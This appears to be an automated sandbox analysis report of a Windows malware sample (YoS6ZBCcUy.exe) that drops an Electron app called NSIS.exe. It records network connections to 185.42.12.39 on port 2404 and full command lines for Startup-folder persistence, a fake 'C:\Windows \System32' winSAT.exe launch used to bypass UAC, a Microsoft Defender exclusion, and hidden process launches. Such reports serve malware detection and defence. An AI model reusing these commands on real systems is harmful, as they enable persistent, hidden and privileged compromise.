                                                                                                                                                                                            Dec 6, 2024 17:37:27.809024096 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:27.809024096 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:27.929433107 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:27.929563999 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:28.014857054 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:28.135016918 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:28.135565996 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:28.139074087 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:28.258800030 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:29.461975098 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:29.674496889 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:29.710803986 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:29.716867924 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:29.716867924 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:29.837847948 CET240450094185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:29.840981007 CET500942404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:29.924525023 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:30.044905901 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:30.048516035 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:30.059823990 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:30.181395054 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.380700111 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.467514992 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.655452967 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.658495903 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.658560991 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.779010057 CET240450095185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.779098034 CET500952404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.843209028 CET500962404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.963239908 CET240450096185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:31.963330030 CET500962404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:31.968478918 CET500962404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:32.088507891 CET240450096185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:33.308568954 CET240450096185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:33.467571020 CET500962404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:33.547185898 CET240450096185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:33.552870035 CET500962404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:33.552970886 CET500962404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:33.672926903 CET240450096185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:33.674537897 CET500962404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:34.561882973 CET500972404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:34.681723118 CET240450097185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:34.681814909 CET500972404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:34.686446905 CET500972404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:34.806245089 CET240450097185.42.12.39192.168.2.4

                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:11:33:25
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\YoS6ZBCcUy.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:84'269'376 bytes
                                                                                                                                                                                            MD5 hash:9E19FD2499E9FFB9CA4EAB08D9054A86
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:11:33:27
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe"
                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:11:33:27
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:11:33:27
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv
                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                            Start time:11:33:27
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\system32\find.exe" "NSIS.exe"
                                                                                                                                                                                            Imagebase:0xc30000
                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                            MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                            Start time:11:34:00
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe"
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                            Start time:11:34:04
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                            Start time:11:34:05
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff780f90000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:11:34:06
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff780f90000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:11:34:06
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:11:34:07
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                            Start time:11:34:07
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                            Start time:11:34:08
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                            Start time:11:34:08
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:11:34:08
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:11:34:09
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff780f90000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                            Start time:11:34:10
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff780f90000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                            Start time:11:34:10
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                            Start time:11:34:10
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                            Start time:11:34:12
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
                                                                                                                                                                                            Imagebase:0x6d0000
                                                                                                                                                                                            File size:2'198'952 bytes
                                                                                                                                                                                            MD5 hash:3AEF228FB7EE187160482084D36C9726
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                            Start time:11:34:18
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe"
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                            Start time:11:34:20
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
